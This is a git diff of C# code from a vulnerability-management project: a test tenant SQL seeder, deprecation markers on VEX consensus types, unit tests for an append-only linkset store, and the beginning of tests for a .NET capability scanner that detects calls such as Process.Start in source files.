+ ///
+ /// Generates SQL INSERT statements for seeding tenants.
+ ///
+ public string GenerateSql()
+ {
+ if (_tenants.Count == 0)
+ {
+ return string.Empty;
+ }
+
+ var sb = new System.Text.StringBuilder();
+ sb.AppendLine("-- Authority tenant seed data (AOC-19-004)");
+ sb.AppendLine("INSERT INTO auth.tenants (id, slug, name, description, contact_email, enabled, settings, metadata, created_at, updated_at, created_by)");
+ sb.AppendLine("VALUES");
+
+ var now = DateTimeOffset.UtcNow;
+ var lines = new List<string>();
+ foreach (var tenant in _tenants)
+ {
+ var settingsJson = JsonSerializer.Serialize(tenant.Settings, JsonOptions);
+ var metadataJson = JsonSerializer.Serialize(tenant.Metadata, JsonOptions);
+ lines.Add($" ('{tenant.Id}', '{EscapeSql(tenant.Slug)}', '{EscapeSql(tenant.Name)}', {NullableString(tenant.Description)}, NULL, {(tenant.Enabled ? "TRUE" : "FALSE")}, '{EscapeSql(settingsJson)}', '{EscapeSql(metadataJson)}', '{now:O}', '{now:O}', 'test-seeder')");
+ }
+
+ sb.AppendLine(string.Join(",\n", lines));
+ sb.AppendLine("ON CONFLICT (slug) DO NOTHING;");
+ return sb.ToString();
+ }
+
+ private void AddTenant(TestTenant tenant)
+ {
+ if (_usedSlugs.Contains(tenant.Slug))
+ {
+ return;
+ }
+
+ _usedSlugs.Add(tenant.Slug);
+ _tenants.Add(tenant);
+ }
+
+ private static string EscapeSql(string value) => value.Replace("'", "''");
+
+ private static string NullableString(string? value) =>
+ value is null ? "NULL" : $"'{EscapeSql(value)}'";
+
+ private static readonly JsonSerializerOptions JsonOptions = new(JsonSerializerDefaults.Web)
+ {
+ WriteIndented = false
+ };
+}
+
+///
+/// Test tenant fixture record.
+///
+public sealed record TestTenant(
+ Guid Id,
+ string Slug,
+ string Name,
+ string? Description,
+ bool Enabled,
+ TestTenantSettings Settings,
+ TestTenantMetadata Metadata);
+
+///
+/// Test tenant settings.
+///
+public sealed record TestTenantSettings(
+ int MaxProviders,
+ int MaxObservationsPerLinkset,
+ bool AllowExternalConnectors,
+ bool AllowAirgapMode,
+ int RetentionDays)
+{
+ ///
+ /// Default test tenant settings.
+ ///
+ public static TestTenantSettings Default { get; } = new TestTenantSettings(
+ MaxProviders: 50,
+ MaxObservationsPerLinkset: 1000,
+ AllowExternalConnectors: true,
+ AllowAirgapMode: false,
+ RetentionDays: 365);
+
+ ///
+ /// Airgap-mode tenant settings.
+ ///
+ public static TestTenantSettings Airgap { get; } = new TestTenantSettings(
+ MaxProviders: 20,
+ MaxObservationsPerLinkset: 500,
+ AllowExternalConnectors: false,
+ AllowAirgapMode: true,
+ RetentionDays: 730);
+}
+
+///
+/// Test tenant metadata.
+///
+public sealed record TestTenantMetadata(
+ string Environment,
+ string Region,
+ string Tier,
+ ImmutableArray<string> Features)
+{
+ ///
+ /// Default test tenant metadata.
+ ///
+ public static TestTenantMetadata Default { get; } = new TestTenantMetadata(
+ Environment: "test",
+ Region: "local",
+ Tier: "free",
+ Features: ImmutableArray<string>.Empty);
+}
diff --git a/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensus.cs b/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensus.cs
index 12f342e8f..9b3c252b1 100644
--- a/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensus.cs
+++ b/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensus.cs
@@ -3,6 +3,15 @@ using System.Runtime.Serialization;
namespace StellaOps.Excititor.Core;
+///
+/// Represents a VEX consensus result from weighted voting.
+///
+///
+/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
+/// Use append-only linksets with
+/// and let downstream policy engines make verdicts.
+///
+[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed record VexConsensus
{
public VexConsensus(
diff --git a/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensusPolicyOptions.cs b/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensusPolicyOptions.cs
index abc3ef41c..c09aea9de 100644
--- a/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensusPolicyOptions.cs
+++ b/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensusPolicyOptions.cs
@@ -2,6 +2,15 @@ using System.Collections.Immutable;
namespace StellaOps.Excititor.Core;
+///
+/// Configuration options for consensus policy weights.
+///
+///
+/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
+/// Use append-only linksets with
+/// and let downstream policy engines make verdicts.
+///
+[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed record VexConsensusPolicyOptions
{
public const string BaselineVersion = "baseline/v1";
diff --git a/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensusResolver.cs b/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensusResolver.cs
index 6f81233df..fc51d489b 100644
--- a/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensusResolver.cs
+++ b/src/Excititor/__Libraries/StellaOps.Excititor.Core/VexConsensusResolver.cs
@@ -3,6 +3,15 @@ using System.Globalization;
namespace StellaOps.Excititor.Core;
+///
+/// Resolves VEX consensus from multiple claims using weighted voting.
+///
+///
+/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
+/// Use append-only linksets with
+/// and let downstream policy engines make verdicts.
+///
+[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed class VexConsensusResolver
{
private readonly IVexConsensusPolicy _policy;
@@ -273,6 +282,14 @@ public sealed class VexConsensusResolver
};
}
+///
+/// Request model for consensus resolution.
+///
+///
+/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
+///
+#pragma warning disable EXCITITOR001 // Using obsolete VexConsensusPolicyOptions
+[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed record VexConsensusRequest(
string VulnerabilityId,
VexProduct Product,
@@ -283,11 +300,26 @@ public sealed record VexConsensusRequest(
VexSignalSnapshot? Signals = null,
string? PolicyRevisionId = null,
string? PolicyDigest = null);
+#pragma warning restore EXCITITOR001
+///
+/// Result of consensus resolution including decision log.
+///
+///
+/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
+///
+[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed record VexConsensusResolution(
VexConsensus Consensus,
ImmutableArray DecisionLog);
+///
+/// Telemetry record for consensus decision auditing.
+///
+///
+/// DEPRECATED: Consensus logic is being removed per AOC-19 contract.
+///
+[Obsolete("Consensus logic is deprecated per AOC-19. Use append-only linksets instead.", DiagnosticId = "EXCITITOR001")]
public sealed record VexConsensusDecisionTelemetry(
string ProviderId,
string DocumentDigest,
diff --git a/src/Excititor/__Tests/StellaOps.Excititor.Core.UnitTests/Observations/AppendOnlyLinksetExtractionServiceTests.cs b/src/Excititor/__Tests/StellaOps.Excititor.Core.UnitTests/Observations/AppendOnlyLinksetExtractionServiceTests.cs
new file mode 100644
index 000000000..25c8d0652
--- /dev/null
+++ b/src/Excititor/__Tests/StellaOps.Excititor.Core.UnitTests/Observations/AppendOnlyLinksetExtractionServiceTests.cs
@@ -0,0 +1,393 @@
+using System;
+using System.Collections.Generic;
+using System.Collections.Immutable;
+using System.Linq;
+using System.Text.Json.Nodes;
+using System.Threading;
+using System.Threading.Tasks;
+using Microsoft.Extensions.Logging.Abstractions;
+using StellaOps.Excititor.Core.Observations;
+using Xunit;
+
+namespace StellaOps.Excititor.Core.UnitTests.Observations;
+
+public class AppendOnlyLinksetExtractionServiceTests
+{
+ private readonly InMemoryAppendOnlyLinksetStore _store;
+ private readonly AppendOnlyLinksetExtractionService _service;
+
+ public AppendOnlyLinksetExtractionServiceTests()
+ {
+ _store = new InMemoryAppendOnlyLinksetStore();
+ _service = new AppendOnlyLinksetExtractionService(
+ _store,
+ NullLogger.Instance);
+ }
+
+ [Fact]
+ public async Task ProcessObservationsAsync_AppendsToStore_WithDeterministicOrdering()
+ {
+ var obs1 = BuildObservation(
+ id: "obs-1",
+ provider: "provider-a",
+ vuln: "CVE-2025-0001",
+ product: "pkg:npm/leftpad",
+ createdAt: DateTimeOffset.Parse("2025-11-20T10:00:00Z"));
+
+ var obs2 = BuildObservation(
+ id: "obs-2",
+ provider: "provider-b",
+ vuln: "CVE-2025-0001",
+ product: "pkg:npm/leftpad",
+ createdAt: DateTimeOffset.Parse("2025-11-20T11:00:00Z"));
+
+ var results = await _service.ProcessObservationsAsync("tenant-a", new[] { obs2, obs1 }, CancellationToken.None);
+
+ Assert.Single(results);
+ var result = results[0];
+ Assert.True(result.Success);
+ Assert.True(result.WasCreated);
+ Assert.Equal(2, result.ObservationsAdded);
+ Assert.NotNull(result.Linkset);
+ Assert.Equal("CVE-2025-0001", result.Linkset.VulnerabilityId);
+ Assert.Equal("pkg:npm/leftpad", result.Linkset.ProductKey);
+ }
+
+ [Fact]
+ public async Task ProcessObservationsAsync_DeduplicatesObservations()
+ {
+ var obs = BuildObservation(
+ id: "obs-1",
+ provider: "provider-a",
+ vuln: "CVE-2025-0001",
+ product: "pkg:npm/leftpad",
+ createdAt: DateTimeOffset.UtcNow);
+
+ // Process the same observation twice
+ await _service.ProcessObservationsAsync("tenant-a", new[] { obs }, CancellationToken.None);
+ var results = await _service.ProcessObservationsAsync("tenant-a", new[] { obs }, CancellationToken.None);
+
+ Assert.Single(results);
+ var result = results[0];
+ Assert.True(result.Success);
+ Assert.False(result.WasCreated); // Already exists
+ Assert.Equal(0, result.ObservationsAdded); // Deduplicated
+ }
+
+ [Fact]
+ public async Task ProcessObservationsAsync_GroupsByVulnerabilityAndProduct()
+ {
+ var obs1 = BuildObservation("obs-1", "provider-a", "CVE-2025-0001", "pkg:npm/foo", DateTimeOffset.UtcNow);
+ var obs2 = BuildObservation("obs-2", "provider-b", "CVE-2025-0001", "pkg:npm/bar", DateTimeOffset.UtcNow);
+ var obs3 = BuildObservation("obs-3", "provider-c", "CVE-2025-0002", "pkg:npm/foo", DateTimeOffset.UtcNow);
+
+ var results = await _service.ProcessObservationsAsync("tenant-a", new[] { obs1, obs2, obs3 }, CancellationToken.None);
+
+ Assert.Equal(3, results.Length);
+ Assert.True(results.All(r => r.Success));
+ Assert.True(results.All(r => r.WasCreated));
+ }
+
+ [Fact]
+ public async Task ProcessObservationsAsync_EnforcesTenantIsolation()
+ {
+ var obs = BuildObservation("obs-1", "provider-a", "CVE-2025-0001", "pkg:npm/leftpad", DateTimeOffset.UtcNow);
+
+ await _service.ProcessObservationsAsync("tenant-a", new[] { obs }, CancellationToken.None);
+ var linkset = await _store.GetByKeyAsync("tenant-b", "CVE-2025-0001", "pkg:npm/leftpad", CancellationToken.None);
+
+ Assert.Null(linkset); // Different tenant should not see it
+ }
+
+ [Fact]
+ public async Task ProcessObservationsAsync_ReturnsEmptyForNullOrEmpty()
+ {
+ var results1 = await _service.ProcessObservationsAsync("tenant-a", null!, CancellationToken.None);
+ var results2 = await _service.ProcessObservationsAsync("tenant-a", Array.Empty<VexObservation>(), CancellationToken.None);
+
+ Assert.Empty(results1);
+ Assert.Empty(results2);
+ }
+
+ [Fact]
+ public async Task AppendDisagreementAsync_AppendsToExistingLinkset()
+ {
+ var obs = BuildObservation("obs-1", "provider-a", "CVE-2025-0001", "pkg:npm/leftpad", DateTimeOffset.UtcNow);
+ await _service.ProcessObservationsAsync("tenant-a", new[] { obs }, CancellationToken.None);
+
+ var disagreement = new VexObservationDisagreement("provider-b", "not_affected", "inline_mitigations_already_exist", 0.9);
+ var result = await _service.AppendDisagreementAsync(
+ "tenant-a",
+ "CVE-2025-0001",
+ "pkg:npm/leftpad",
+ disagreement,
+ CancellationToken.None);
+
+ Assert.True(result.Success);
+ Assert.Equal(1, result.DisagreementsAdded);
+ Assert.NotNull(result.Linkset);
+ Assert.True(result.Linkset.HasConflicts);
+ }
+
+ [Fact]
+ public async Task AppendDisagreementAsync_CreatesLinksetIfNotExists()
+ {
+ var disagreement = new VexObservationDisagreement("provider-a", "affected", null, null);
+ var result = await _service.AppendDisagreementAsync(
+ "tenant-a",
+ "CVE-2025-9999",
+ "pkg:npm/new-package",
+ disagreement,
+ CancellationToken.None);
+
+ Assert.True(result.Success);
+ Assert.True(result.WasCreated);
+ Assert.Equal(1, result.DisagreementsAdded);
+ }
+
+ private static VexObservation BuildObservation(string id, string provider, string vuln, string product, DateTimeOffset createdAt)
+ {
+ var statement = new VexObservationStatement(
+ vulnerabilityId: vuln,
+ productKey: product,
+ status: VexClaimStatus.Affected,
+ lastObserved: null,
+ locator: null,
+ justification: null,
+ introducedVersion: null,
+ fixedVersion: null,
+ purl: product,
+ cpe: null,
+ evidence: null,
+ metadata: null);
+
+ var upstream = new VexObservationUpstream(
+ upstreamId: $"upstream-{id}",
+ documentVersion: "1",
+ fetchedAt: createdAt,
+ receivedAt: createdAt,
+ contentHash: "sha256:deadbeef",
+ signature: new VexObservationSignature(false, null, null, null));
+
+ var content = new VexObservationContent(
+ format: "openvex",
+ specVersion: "1.0.0",
+ raw: JsonNode.Parse("{}")!,
+ metadata: null);
+
+ var linkset = new VexObservationLinkset(
+ aliases: new[] { vuln },
+ purls: new[] { product },
+ cpes: Array.Empty(),
+ references: Array.Empty());
+
+ return new VexObservation(
+ observationId: id,
+ tenant: "tenant-a",
+ providerId: provider,
+ streamId: "ingest",
+ upstream: upstream,
+ statements: ImmutableArray.Create(statement),
+ content: content,
+ linkset: linkset,
+ createdAt: createdAt);
+ }
+}
+
+///
+/// In-memory implementation of IAppendOnlyLinksetStore for testing.
+///
+internal class InMemoryAppendOnlyLinksetStore : IAppendOnlyLinksetStore
+{
+ private readonly Dictionary<string, VexLinkset> _linksets = new();
+ private readonly List<LinksetMutationEvent> _mutations = new();
+ private long _sequenceNumber = 0;
+ private readonly object _lock = new();
+
+ public ValueTask<AppendLinksetResult> AppendObservationAsync(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ VexLinksetObservationRefModel observation,
+ VexProductScope scope,
+ CancellationToken cancellationToken)
+ {
+ return AppendObservationsBatchAsync(tenant, vulnerabilityId, productKey, new[] { observation }, scope, cancellationToken);
+ }
+
+ public ValueTask<AppendLinksetResult> AppendObservationsBatchAsync(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ IEnumerable<VexLinksetObservationRefModel> observations,
+ VexProductScope scope,
+ CancellationToken cancellationToken)
+ {
+ lock (_lock)
+ {
+ var linksetId = VexLinkset.CreateLinksetId(tenant, vulnerabilityId, productKey);
+ var key = $"{tenant}|{linksetId}";
+ var wasCreated = false;
+ var observationsAdded = 0;
+
+ if (!_linksets.TryGetValue(key, out var linkset))
+ {
+ wasCreated = true;
+ linkset = new VexLinkset(
+ linksetId, tenant, vulnerabilityId, productKey, scope,
+ Enumerable.Empty<VexLinksetObservationRefModel>(),
+ null, DateTimeOffset.UtcNow, DateTimeOffset.UtcNow);
+ _linksets[key] = linkset;
+
+ _mutations.Add(new LinksetMutationEvent(
+ ++_sequenceNumber, LinksetMutationEvent.MutationTypes.LinksetCreated,
+ DateTimeOffset.UtcNow, null, null, null, null, null));
+ }
+
+ var existingObsIds = new HashSet<string>(
+ linkset.Observations.Select(o => o.ObservationId),
+ StringComparer.Ordinal);
+
+ var newObservations = observations
+ .Where(o => !existingObsIds.Contains(o.ObservationId))
+ .ToList();
+
+ if (newObservations.Count > 0)
+ {
+ var allObservations = linkset.Observations.Concat(newObservations);
+ linkset = linkset.WithObservations(allObservations, linkset.Disagreements);
+ _linksets[key] = linkset;
+ observationsAdded = newObservations.Count;
+
+ foreach (var obs in newObservations)
+ {
+ _mutations.Add(new LinksetMutationEvent(
+ ++_sequenceNumber, LinksetMutationEvent.MutationTypes.ObservationAdded,
+ DateTimeOffset.UtcNow, obs.ObservationId, obs.ProviderId, obs.Status, obs.Confidence, null));
+ }
+ }
+
+ return ValueTask.FromResult(wasCreated
+ ? AppendLinksetResult.Created(linkset, observationsAdded, _sequenceNumber)
+ : (observationsAdded > 0
+ ? AppendLinksetResult.Updated(linkset, observationsAdded, 0, _sequenceNumber)
+ : AppendLinksetResult.NoChange(linkset, _sequenceNumber)));
+ }
+ }
+
+ public ValueTask<AppendLinksetResult> AppendDisagreementAsync(
+ string tenant,
+ string vulnerabilityId,
+ string productKey,
+ VexObservationDisagreement disagreement,
+ CancellationToken cancellationToken)
+ {
+ lock (_lock)
+ {
+ var linksetId = VexLinkset.CreateLinksetId(tenant, vulnerabilityId, productKey);
+ var key = $"{tenant}|{linksetId}";
+ var wasCreated = false;
+
+ if (!_linksets.TryGetValue(key, out var linkset))
+ {
+ wasCreated = true;
+ var scope = VexProductScope.Unknown(productKey);
+ linkset = new VexLinkset(
+ linksetId, tenant, vulnerabilityId, productKey, scope,
+ Enumerable.Empty<VexLinksetObservationRefModel>(),
+ null, DateTimeOffset.UtcNow, DateTimeOffset.UtcNow);
+ }
+
+ var allDisagreements = linkset.Disagreements.Append(disagreement);
+ linkset = linkset.WithObservations(linkset.Observations, allDisagreements);
+ _linksets[key] = linkset;
+
+ _mutations.Add(new LinksetMutationEvent(
+ ++_sequenceNumber, LinksetMutationEvent.MutationTypes.DisagreementAdded,
+ DateTimeOffset.UtcNow, null, disagreement.ProviderId, disagreement.Status,
+ disagreement.Confidence, disagreement.Justification));
+
+ return ValueTask.FromResult(wasCreated
+ ? AppendLinksetResult.Created(linkset, 0, _sequenceNumber)
+ : AppendLinksetResult.Updated(linkset, 0, 1, _sequenceNumber));
+ }
+ }
+
+ public ValueTask<VexLinkset?> GetByIdAsync(string tenant, string linksetId, CancellationToken cancellationToken)
+ {
+ lock (_lock)
+ {
+ var key = $"{tenant}|{linksetId}";
+ _linksets.TryGetValue(key, out var linkset);
+ return ValueTask.FromResult(linkset);
+ }
+ }
+
+ public ValueTask<VexLinkset?> GetByKeyAsync(string tenant, string vulnerabilityId, string productKey, CancellationToken cancellationToken)
+ {
+ var linksetId = VexLinkset.CreateLinksetId(tenant, vulnerabilityId, productKey);
+ return GetByIdAsync(tenant, linksetId, cancellationToken);
+ }
+
+ public ValueTask<IReadOnlyList<VexLinkset>> FindByVulnerabilityAsync(string tenant, string vulnerabilityId, int limit, CancellationToken cancellationToken)
+ {
+ lock (_lock)
+ {
+ var results = _linksets.Values
+ .Where(l => l.Tenant == tenant && string.Equals(l.VulnerabilityId, vulnerabilityId, StringComparison.OrdinalIgnoreCase))
+ .Take(limit)
+ .ToList();
+ return ValueTask.FromResult<IReadOnlyList<VexLinkset>>(results);
+ }
+ }
+
+ public ValueTask<IReadOnlyList<VexLinkset>> FindByProductKeyAsync(string tenant, string productKey, int limit, CancellationToken cancellationToken)
+ {
+ lock (_lock)
+ {
+ var results = _linksets.Values
+ .Where(l => l.Tenant == tenant && string.Equals(l.ProductKey, productKey, StringComparison.OrdinalIgnoreCase))
+ .Take(limit)
+ .ToList();
+ return ValueTask.FromResult<IReadOnlyList<VexLinkset>>(results);
+ }
+ }
+
+ public ValueTask<IReadOnlyList<VexLinkset>> FindWithConflictsAsync(string tenant, int limit, CancellationToken cancellationToken)
+ {
+ lock (_lock)
+ {
+ var results = _linksets.Values
+ .Where(l => l.Tenant == tenant && l.HasConflicts)
+ .Take(limit)
+ .ToList();
+ return ValueTask.FromResult<IReadOnlyList<VexLinkset>>(results);
+ }
+ }
+
+ public ValueTask<long> CountAsync(string tenant, CancellationToken cancellationToken)
+ {
+ lock (_lock)
+ {
+ var count = _linksets.Values.Count(l => l.Tenant == tenant);
+ return ValueTask.FromResult((long)count);
+ }
+ }
+
+ public ValueTask<long> CountWithConflictsAsync(string tenant, CancellationToken cancellationToken)
+ {
+ lock (_lock)
+ {
+ var count = _linksets.Values.Count(l => l.Tenant == tenant && l.HasConflicts);
+ return ValueTask.FromResult((long)count);
+ }
+ }
+
+ public ValueTask<IReadOnlyList<LinksetMutationEvent>> GetMutationLogAsync(string tenant, string linksetId, CancellationToken cancellationToken)
+ {
+ lock (_lock)
+ {
+ return ValueTask.FromResult<IReadOnlyList<LinksetMutationEvent>>(_mutations.ToList());
+ }
+ }
+}
diff --git a/src/Excititor/__Tests/StellaOps.Excititor.Core.UnitTests/Testing/AuthorityTenantSeederTests.cs b/src/Excititor/__Tests/StellaOps.Excititor.Core.UnitTests/Testing/AuthorityTenantSeederTests.cs
new file mode 100644
index 000000000..2a910b89b
--- /dev/null
+++ b/src/Excititor/__Tests/StellaOps.Excititor.Core.UnitTests/Testing/AuthorityTenantSeederTests.cs
@@ -0,0 +1,231 @@
+using System;
+using System.Collections.Immutable;
+using System.Linq;
+using StellaOps.Excititor.Core.Testing;
+using Xunit;
+
+namespace StellaOps.Excititor.Core.UnitTests.Testing;
+
+public class AuthorityTenantSeederTests
+{
+ [Fact]
+ public void DefaultTenant_HasExpectedValues()
+ {
+ var tenant = AuthorityTenantSeeder.DefaultTenant;
+
+ Assert.NotEqual(Guid.Empty, tenant.Id);
+ Assert.Equal("test", tenant.Slug);
+ Assert.Equal("Test Tenant", tenant.Name);
+ Assert.True(tenant.Enabled);
+ Assert.NotNull(tenant.Settings);
+ Assert.NotNull(tenant.Metadata);
+ }
+
+ [Fact]
+ public void MultiTenantFixtures_ContainsThreeTenants()
+ {
+ var fixtures = AuthorityTenantSeeder.MultiTenantFixtures;
+
+ Assert.Equal(3, fixtures.Length);
+ Assert.Contains(fixtures, t => t.Slug == "acme");
+ Assert.Contains(fixtures, t => t.Slug == "beta");
+ Assert.Contains(fixtures, t => t.Slug == "gamma");
+ }
+
+ [Fact]
+ public void MultiTenantFixtures_GammaIsDisabled()
+ {
+ var gamma = AuthorityTenantSeeder.MultiTenantFixtures.Single(t => t.Slug == "gamma");
+
+ Assert.False(gamma.Enabled);
+ }
+
+ [Fact]
+ public void AirgapTenant_HasRestrictedSettings()
+ {
+ var tenant = AuthorityTenantSeeder.AirgapTenant;
+
+ Assert.Equal("airgap-test", tenant.Slug);
+ Assert.False(tenant.Settings.AllowExternalConnectors);
+ Assert.True(tenant.Settings.AllowAirgapMode);
+ Assert.Equal("airgap", tenant.Metadata.Environment);
+ }
+
+ [Fact]
+ public void WithDefaultTenant_AddsTenantToSeedSet()
+ {
+ var seeder = new AuthorityTenantSeeder()
+ .WithDefaultTenant();
+
+ var tenants = seeder.GetTenants();
+
+ Assert.Single(tenants);
+ Assert.Equal("test", tenants[0].Slug);
+ }
+
+ [Fact]
+ public void WithMultiTenantFixtures_AddsAllFixtures()
+ {
+ var seeder = new AuthorityTenantSeeder()
+ .WithMultiTenantFixtures();
+
+ var tenants = seeder.GetTenants();
+ var slugs = seeder.GetSlugs();
+
+ Assert.Equal(3, tenants.Count);
+ Assert.Contains("acme", slugs);
+ Assert.Contains("beta", slugs);
+ Assert.Contains("gamma", slugs);
+ }
+
+ [Fact]
+ public void WithTenant_AddsDuplicateSlugOnce()
+ {
+ var seeder = new AuthorityTenantSeeder()
+ .WithDefaultTenant()
+ .WithDefaultTenant(); // Duplicate
+
+ var tenants = seeder.GetTenants();
+
+ Assert.Single(tenants);
+ }
+
+ [Fact]
+ public void WithCustomTenant_AddsToSeedSet()
+ {
+ var customTenant = new TestTenant(
+ Id: Guid.NewGuid(),
+ Slug: "custom",
+ Name: "Custom Tenant",
+ Description: "A custom test tenant",
+ Enabled: true,
+ Settings: TestTenantSettings.Default,
+ Metadata: new TestTenantMetadata("test", "local", "free", ImmutableArray<string>.Empty));
+
+ var seeder = new AuthorityTenantSeeder()
+ .WithTenant(customTenant);
+
+ var tenants = seeder.GetTenants();
+
+ Assert.Single(tenants);
+ Assert.Equal("custom", tenants[0].Slug);
+ }
+
+ [Fact]
+ public void WithTenant_SimpleOverload_CreatesMinimalTenant()
+ {
+ var seeder = new AuthorityTenantSeeder()
+ .WithTenant("simple", "Simple Tenant", enabled: false);
+
+ var tenants = seeder.GetTenants();
+
+ Assert.Single(tenants);
+ Assert.Equal("simple", tenants[0].Slug);
+ Assert.Equal("Simple Tenant", tenants[0].Name);
+ Assert.False(tenants[0].Enabled);
+ }
+
+ [Fact]
+ public void GenerateSql_ProducesValidInsertStatements()
+ {
+ var seeder = new AuthorityTenantSeeder()
+ .WithDefaultTenant();
+
+ var sql = seeder.GenerateSql();
+
+ Assert.Contains("INSERT INTO auth.tenants", sql);
+ Assert.Contains("'test'", sql);
+ Assert.Contains("'Test Tenant'", sql);
+ Assert.Contains("ON CONFLICT (slug) DO NOTHING", sql);
+ }
+
+ [Fact]
+ public void GenerateSql_ReturnsEmptyForNoTenants()
+ {
+ var seeder = new AuthorityTenantSeeder();
+
+ var sql = seeder.GenerateSql();
+
+ Assert.Equal(string.Empty, sql);
+ }
+
+ [Fact]
+ public void GenerateSql_EscapesSingleQuotes()
+ {
+ var tenant = new TestTenant(
+ Id: Guid.NewGuid(),
+ Slug: "test-escape",
+ Name: "O'Reilly's Tenant",
+ Description: "Contains 'quotes'",
+ Enabled: true,
+ Settings: TestTenantSettings.Default,
+ Metadata: TestTenantMetadata.Default);
+
+ var seeder = new AuthorityTenantSeeder()
+ .WithTenant(tenant);
+
+ var sql = seeder.GenerateSql();
+
+ Assert.Contains("O''Reilly''s Tenant", sql);
+ }
+
+ [Fact]
+ public void ChainedBuilderPattern_WorksCorrectly()
+ {
+ var seeder = new AuthorityTenantSeeder()
+ .WithDefaultTenant()
+ .WithMultiTenantFixtures()
+ .WithAirgapTenant()
+ .WithTenant("custom", "Custom");
+
+ var tenants = seeder.GetTenants();
+
+ Assert.Equal(5, tenants.Count); // 1 + 3 + 1 (custom)
+ // Note: airgap tenant is separate
+ }
+
+ [Fact]
+ public void TestTenantSettings_Default_HasExpectedValues()
+ {
+ var settings = TestTenantSettings.Default;
+
+ Assert.Equal(50, settings.MaxProviders);
+ Assert.Equal(1000, settings.MaxObservationsPerLinkset);
+ Assert.True(settings.AllowExternalConnectors);
+ Assert.False(settings.AllowAirgapMode);
+ Assert.Equal(365, settings.RetentionDays);
+ }
+
+ [Fact]
+ public void TestTenantSettings_Airgap_HasRestrictedValues()
+ {
+ var settings = TestTenantSettings.Airgap;
+
+ Assert.Equal(20, settings.MaxProviders);
+ Assert.Equal(500, settings.MaxObservationsPerLinkset);
+ Assert.False(settings.AllowExternalConnectors);
+ Assert.True(settings.AllowAirgapMode);
+ Assert.Equal(730, settings.RetentionDays);
+ }
+
+ [Fact]
+ public void TestTenantMetadata_Default_HasExpectedValues()
+ {
+ var metadata = TestTenantMetadata.Default;
+
+ Assert.Equal("test", metadata.Environment);
+ Assert.Equal("local", metadata.Region);
+ Assert.Equal("free", metadata.Tier);
+ Assert.Empty(metadata.Features);
+ }
+
+ [Fact]
+ public void MultiTenantFixtures_AcmeHasFeatures()
+ {
+ var acme = AuthorityTenantSeeder.MultiTenantFixtures.Single(t => t.Slug == "acme");
+
+ Assert.Contains("vex-ingestion", acme.Metadata.Features);
+ Assert.Contains("policy-engine", acme.Metadata.Features);
+ Assert.Contains("graph-explorer", acme.Metadata.Features);
+ }
+}
diff --git a/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.DotNet.Tests/Internal/DotNetCapabilityScannerTests.cs b/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.DotNet.Tests/Internal/DotNetCapabilityScannerTests.cs
new file mode 100644
index 000000000..cbfc23735
--- /dev/null
+++ b/src/Scanner/__Tests/StellaOps.Scanner.Analyzers.Lang.DotNet.Tests/Internal/DotNetCapabilityScannerTests.cs
@@ -0,0 +1,806 @@
+using StellaOps.Scanner.Analyzers.Lang.DotNet.Internal.Capabilities;
+
+namespace StellaOps.Scanner.Analyzers.Lang.DotNet.Tests.Internal;
+
+/// <summary>
+/// Tests for <see cref="DotNetCapabilityScanner"/>.
+/// </summary>
+public sealed class DotNetCapabilityScannerTests
+{
+ private const string TestFile = "Test.cs";
+
+ #region ScanFile - General Tests
+
+ [Fact]
+ public void ScanFile_NullContent_ReturnsEmpty()
+ {
+ var result = DotNetCapabilityScanner.ScanFile(null!, TestFile);
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_EmptyContent_ReturnsEmpty()
+ {
+ var result = DotNetCapabilityScanner.ScanFile("", TestFile);
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_WhitespaceContent_ReturnsEmpty()
+ {
+ var result = DotNetCapabilityScanner.ScanFile(" \n\t\n ", TestFile);
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_NoPatterns_ReturnsEmpty()
+ {
+ const string code = @"
+namespace Test
+{
+ public class Program
+ {
+ public static void Main() => Console.WriteLine(""Hello"");
+ }
+}";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ Assert.Empty(result);
+ }
+
+ [Fact]
+ public void ScanFile_NormalizesBackslashesInPath()
+ {
+ const string code = @"Process.Start(""notepad.exe"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, @"C:\src\Test.cs");
+
+ Assert.Single(result);
+ Assert.Equal("C:/src/Test.cs", result[0].SourceFile);
+ }
+
+ [Fact]
+ public void ScanFile_DeduplicatesSamePatternOnSameLine()
+ {
+ const string code = @"Process.Start(""cmd""); Process.Start(""notepad"");";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
+ // Same pattern on same line should be deduplicated
+ Assert.Single(result);
+ }
+
+ #endregion
+
+ #region ScanFile - Comment Stripping
+
+ [Fact]
+ public void ScanFile_IgnoresSingleLineComments()
+ {
+ const string code = @"
+// Process.Start(""cmd"");
+public void Method() { }";
+ var result = DotNetCapabilityScanner.ScanFile(code, TestFile);
+
